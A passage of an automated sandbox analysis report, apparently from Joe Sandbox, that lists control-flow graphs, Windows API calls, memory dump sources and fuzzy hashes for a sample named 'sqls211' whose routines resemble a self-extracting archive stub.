ceab2f-ceab3f WideCharToMultiByte 969->971 970->971 971->954 972 ceab6f-ceab76 call ceabc3 971->972 972->934
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CE5695,00CE5695,?,?,?,00CEABAC,00000001,00000001,2DE85006), ref: 00CEA9B5
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CEABAC,00000001,00000001,2DE85006,?,?,?), ref: 00CEAA3B
                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CEAB35
                                                                                                            • __freea.LIBCMT ref: 00CEAB42
                                                                                                              • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CECA2C,00000000,?,00CE6CBE,?,00000008,?,00CE91E0,?,?,?), ref: 00CE8E38
                                                                                                            • __freea.LIBCMT ref: 00CEAB4B
                                                                                                            • __freea.LIBCMT ref: 00CEAB70
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1414292761-0
                                                                                                            • Opcode ID: e7ed774221500d87e9982c1eccf655f8396b4d0d984dccc3448406566d2c78ad
                                                                                                            • Instruction ID: 394873555f12b319fb3a7ed021e714bbc15fae949e484ff91a9df56f4cc9c751
                                                                                                            • Opcode Fuzzy Hash: e7ed774221500d87e9982c1eccf655f8396b4d0d984dccc3448406566d2c78ad
                                                                                                            • Instruction Fuzzy Hash: 1E511372600296AFDB258F66CC81FBFB7AAEB44710F154629FC14D7150EB34ED40E6A2

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 975 ce3b72-ce3b7c 976 ce3bee-ce3bf1 975->976 977 ce3b7e-ce3b8c 976->977 978 ce3bf3 976->978 980 ce3b8e-ce3b91 977->980 981 ce3b95-ce3bb1 LoadLibraryExW 977->981 979 ce3bf5-ce3bf9 978->979 982 ce3c09-ce3c0b 980->982 983 ce3b93 980->983 984 ce3bfa-ce3c00 981->984 985 ce3bb3-ce3bbc GetLastError 981->985 982->979 987 ce3beb 983->987 984->982 986 ce3c02-ce3c03 FreeLibrary 984->986 988 ce3bbe-ce3bd3 call ce6088 985->988 989 ce3be6-ce3be9 985->989 986->982 987->976 988->989 992 ce3bd5-ce3be4 LoadLibraryExW 988->992 989->987 992->984 992->989
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00CE3C35,?,?,00D22088,00000000,?,00CE3D60,00000004,InitializeCriticalSectionEx,00CF6394,InitializeCriticalSectionEx,00000000), ref: 00CE3C03
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrary
                                                                                                            • String ID: api-ms-
                                                                                                            • API String ID: 3664257935-2084034818
                                                                                                            • Opcode ID: 7a92d0a14e427bf5018975824f0e475e806983e02cc20b8df6c9f4aa54888dd6
                                                                                                            • Instruction ID: 46a680e3441b0d8576348b3d588e429533b6d074818922ee032e357d82fbd051
                                                                                                            • Opcode Fuzzy Hash: 7a92d0a14e427bf5018975824f0e475e806983e02cc20b8df6c9f4aa54888dd6
                                                                                                            • Instruction Fuzzy Hash: 3F11A731A452E5ABCB218B6A9C49B6E37649F01770F250211E926EB2D0D775FF00C6D2

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 993 cdabab-cdabca GetClassNameW 994 cdabcc-cdabe1 call cd1fbb 993->994 995 cdabf2-cdabf4 993->995 1000 cdabf1 994->1000 1001 cdabe3-cdabef FindWindowExW 994->1001 997 cdabff-cdac01 995->997 998 cdabf6-cdabf8 995->998 998->997 1000->995 1001->1000
                                                                                                            APIs
                                                                                                            • GetClassNameW.USER32(?,?,00000050), ref: 00CDABC2
                                                                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CDABF9
                                                                                                              • Part of subcall function 00CD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CCC116,00000000,.exe,?,?,00000800,?,?,?,00CD8E3C), ref: 00CD1FD1
                                                                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CDABE9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                            • String ID: @Ut$EDIT
                                                                                                            • API String ID: 4243998846-2065656831
                                                                                                            • Opcode ID: cdc449800469df18583b6a5ac0a671612c4e9f8812830d42da6ab4f31b84dffd
                                                                                                            • Instruction ID: 4382d83a25ac211aae670a6f89fd2c60ad92ecf02db42293ebbe41e5f0f513b6
                                                                                                            • Opcode Fuzzy Hash: cdc449800469df18583b6a5ac0a671612c4e9f8812830d42da6ab4f31b84dffd
                                                                                                            • Instruction Fuzzy Hash: D4F0823260132877DB305B649C09FAB76AC9B46B40F484013BB05E22C0D765DB4286BA

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00CD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                                                                              • Part of subcall function 00CD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                                                                            • OleInitialize.OLE32(00000000), ref: 00CDAC2F
                                                                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CDAC66
                                                                                                            • SHGetMalloc.SHELL32(00D08438), ref: 00CDAC70
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                            • String ID: riched20.dll$3Qo
                                                                                                            • API String ID: 3498096277-4232643773
                                                                                                            • Opcode ID: 32be95efdb5c289ba553eda85534b92df93d7a01f3da43a2644ead93810cc352
                                                                                                            • Instruction ID: 7da2cd2f8d7291c42257a5a985dfd7a5bfb2157884af74b08e8ecdbf17264e48
                                                                                                            • Opcode Fuzzy Hash: 32be95efdb5c289ba553eda85534b92df93d7a01f3da43a2644ead93810cc352
                                                                                                            • Instruction Fuzzy Hash: A4F0FFB1D00209ABCB20AFA9D9499AFFBFCEF94700F004157A555E2241DBB856069BB1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1006 cc98e0-cc9901 call cdec50 1009 cc990c 1006->1009 1010 cc9903-cc9906 1006->1010 1012 cc990e-cc991f 1009->1012 1010->1009 1011 cc9908-cc990a 1010->1011 1011->1012 1013 cc9927-cc9931 1012->1013 1014 cc9921 1012->1014 1015 cc9936-cc9943 call cc6edb 1013->1015 1016 cc9933 1013->1016 1014->1013 1019 cc994b-cc996a CreateFileW 1015->1019 1020 cc9945 1015->1020 1016->1015 1021 cc996c-cc998e GetLastError call ccbb03 1019->1021 1022 cc99bb-cc99bf 1019->1022 1020->1019 1026 cc99c8-cc99cd 1021->1026 1028 cc9990-cc99b3 CreateFileW GetLastError 1021->1028 1024 cc99c3-cc99c6 1022->1024 1024->1026 1027 cc99d9-cc99de 1024->1027 1026->1027 1029 cc99cf 1026->1029 1030 cc99ff-cc9a10 1027->1030 1031 cc99e0-cc99e3 1027->1031 1028->1024 1032 cc99b5-cc99b9 1028->1032 1029->1027 1034 cc9a2e-cc9a39 1030->1034 1035 cc9a12-cc9a2a call cd0602 1030->1035 1031->1030 1033 cc99e5-cc99f9 SetFileTime 1031->1033 1032->1024 1033->1030 1035->1034
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00CC7760,?,00000005,?,00000011), ref: 00CC995F
                                                                                                            • GetLastError.KERNEL32(?,?,00CC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC996C
                                                                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00CC7760,?,00000005,?), ref: 00CC99A2
                                                                                                            • GetLastError.KERNEL32(?,?,00CC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC99AA
                                                                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00CC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC99F9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateErrorLast$Time
                                                                                                            • String ID:
                                                                                                            • API String ID: 1999340476-0
                                                                                                            • Opcode ID: 005f8fb81aed0e78cc146d7ec5f054bf7f93941a36e28d586e0425e6657abbf9
                                                                                                            • Instruction ID: ee3130689e0b5fdad901d7914275a5fd7f170291d3bc86b775d2090d0920129b
                                                                                                            • Opcode Fuzzy Hash: 005f8fb81aed0e78cc146d7ec5f054bf7f93941a36e28d586e0425e6657abbf9
                                                                                                            • Instruction Fuzzy Hash: 9E3121309447816FE7309F24CC4AFAABB94FB04320F200B1EF9B9961D0D7B4AA44CB95

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1065 cddbde-cddc09 call cdec50 SetEnvironmentVariableW call cd0371 1069 cddc0e-cddc12 1065->1069 1070 cddc14-cddc18 1069->1070 1071 cddc36-cddc38 1069->1071 1072 cddc21-cddc28 call cd048d 1070->1072 1075 cddc1a-cddc20 1072->1075 1076 cddc2a-cddc30 SetEnvironmentVariableW 1072->1076 1075->1072 1076->1071
                                                                                                            APIs
                                                                                                            • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CDDBF4
                                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CDDC30
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentVariable
                                                                                                            • String ID: sfxcmd$sfxpar
                                                                                                            • API String ID: 1431749950-3493335439
                                                                                                            • Opcode ID: b6dc94e8f9fe02f6c6151e0e4d681363ea7c2202572adcc179bc525e637cd425
                                                                                                            • Instruction ID: 9d80cf915c9a5441e0732f6dee2af9bf541682a27d0064f8b38db668d830626f
                                                                                                            • Opcode Fuzzy Hash: b6dc94e8f9fe02f6c6151e0e4d681363ea7c2202572adcc179bc525e637cd425
                                                                                                            • Instruction Fuzzy Hash: 24F0EC7291422877CB202F958C06FFF7B58BF44781F044413FF8696255D6B09940D6B1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1077 cc9785-cc9791 1078 cc979e-cc97b5 ReadFile 1077->1078 1079 cc9793-cc979b GetStdHandle 1077->1079 1080 cc97b7-cc97c0 call cc98bc 1078->1080 1081 cc9811 1078->1081 1079->1078 1085 cc97d9-cc97dd 1080->1085 1086 cc97c2-cc97ca 1080->1086 1083 cc9814-cc9817 1081->1083 1088 cc97ee-cc97f2 1085->1088 1089 cc97df-cc97e8 GetLastError 1085->1089 1086->1085 1087 cc97cc 1086->1087 1090 cc97cd-cc97d7 call cc9785 1087->1090 1092 cc980c-cc980f 1088->1092 1093 cc97f4-cc97fc 1088->1093 1089->1088 1091 cc97ea-cc97ec 1089->1091 1090->1083 1091->1083 1092->1083 1093->1092 1095 cc97fe-cc9807 GetLastError 1093->1095 1095->1092 1096 cc9809-cc980a 1095->1096 1096->1090
                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00CC9795
                                                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00CC97AD
                                                                                                            • GetLastError.KERNEL32 ref: 00CC97DF
                                                                                                            • GetLastError.KERNEL32 ref: 00CC97FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$FileHandleRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2244327787-0
                                                                                                            • Opcode ID: b23d9a1d43deb2e476d53e1d2c0cee34a944809c54cc3a80e5fafd10bed4a0d6
                                                                                                            • Instruction ID: 48957f2716f86bd32fb15a278d8bb7808ebd1a2c46edab073a59170e8fca7e2c
                                                                                                            • Opcode Fuzzy Hash: b23d9a1d43deb2e476d53e1d2c0cee34a944809c54cc3a80e5fafd10bed4a0d6
                                                                                                            • Instruction Fuzzy Hash: 2B113C31914614EBDF205F65C808F6D37B9FB42361F10892EE426C61D0DB749F44DB62

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1098 cead34-cead48 1099 cead4a-cead53 1098->1099 1100 cead55-cead70 LoadLibraryExW 1098->1100 1101 ceadac-ceadae 1099->1101 1102 cead99-cead9f 1100->1102 1103 cead72-cead7b GetLastError 1100->1103 1106 ceada8 1102->1106 1107 ceada1-ceada2 FreeLibrary 1102->1107 1104 cead7d-cead88 LoadLibraryExW 1103->1104 1105 cead8a 1103->1105 1108 cead8c-cead8e 1104->1108 1105->1108 1109 ceadaa-ceadab 1106->1109 1107->1106 1108->1102 1110 cead90-cead97 1108->1110 1109->1101 1110->1109
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00CCD710,00000000,00000000,?,00CEACDB,00CCD710,00000000,00000000,00000000,?,00CEAED8,00000006,FlsSetValue), ref: 00CEAD66
                                                                                                            • GetLastError.KERNEL32(?,00CEACDB,00CCD710,00000000,00000000,00000000,?,00CEAED8,00000006,FlsSetValue,00CF7970,FlsSetValue,00000000,00000364,?,00CE98B7), ref: 00CEAD72
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CEACDB,00CCD710,00000000,00000000,00000000,?,00CEAED8,00000006,FlsSetValue,00CF7970,FlsSetValue,00000000), ref: 00CEAD80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 3177248105-0
                                                                                                            • Opcode ID: 1fe44525917c1585e5cff54f7c58167ac2400f31948403711f43afed5a36b87a
                                                                                                            • Instruction ID: edf6b42aed365bb0b5e3328558e63d95bef0eb2d7aa2d03fa4ecbbeb2834bd10
                                                                                                            • Opcode Fuzzy Hash: 1fe44525917c1585e5cff54f7c58167ac2400f31948403711f43afed5a36b87a
                                                                                                            • Instruction Fuzzy Hash: 7601F7362012A2BFC7214B6A9C44BAB7B58EF05BA27110620F916D3550DB25EB01C6E2
                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00CCD343,00000001,?,?,?,00000000,00CD551D,?,?,?), ref: 00CC9F9E
                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00CD551D,?,?,?,?,?,00CD4FC7,?), ref: 00CC9FE5
                                                                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00CCD343,00000001,?,?), ref: 00CCA011
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite$Handle
                                                                                                            • String ID:
                                                                                                            • API String ID: 4209713984-0
                                                                                                            • Opcode ID: 569eb953b9e19f97f4df6710abc0e56e3b901a90083bebfe7fea6b33e04743f4
                                                                                                            • Instruction ID: b38c8215e631b9e70e08bc9cad3c2ea45145c874d711bd7d3574418246fc2abd
                                                                                                            • Opcode Fuzzy Hash: 569eb953b9e19f97f4df6710abc0e56e3b901a90083bebfe7fea6b33e04743f4
                                                                                                            • Instruction Fuzzy Hash: D231C031204349AFDB14CF20D80CF6EB7A5EF85754F00451DF89297290CB75AE88CBA2
                                                                                                            APIs
                                                                                                              • Part of subcall function 00CCC27E: _wcslen.LIBCMT ref: 00CCC284
                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA2D9
                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA30C
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA329
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2260680371-0
                                                                                                            • Opcode ID: f39920de5fca2efca15e2ea8b120c7ff515a40072442e72c2635ec1b43f57c48
                                                                                                            • Instruction ID: 752ca8df1bc4bd483af08d2b327e6a53d28a83fb8ad7cd8bbed4708503f00eca
                                                                                                            • Opcode Fuzzy Hash: f39920de5fca2efca15e2ea8b120c7ff515a40072442e72c2635ec1b43f57c48
                                                                                                            • Instruction Fuzzy Hash: 2E01B5712002A86AEF21ABB5CC5DFFD36489F09789F08441DF912D61A1DB54CB81D6B7
                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00CEB8B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Info
                                                                                                            • String ID:
                                                                                                            • API String ID: 1807457897-3916222277
                                                                                                            • Opcode ID: 41c7e746a2e298a1ad9f01c0c8d7348faadc20993ad43407e71620d805461f40
                                                                                                            • Instruction ID: 92b9e9f93c872134a54cd602f560f55df6221085a54b4803d8ac6619156fb471
                                                                                                            • Opcode Fuzzy Hash: 41c7e746a2e298a1ad9f01c0c8d7348faadc20993ad43407e71620d805461f40
                                                                                                            • Instruction Fuzzy Hash: 7141D4705043CC9ADB218E668C84BFBBBB9EB45304F1404EDE69A86143D335AE45DB61
                                                                                                            APIs
                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00CEAFDD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
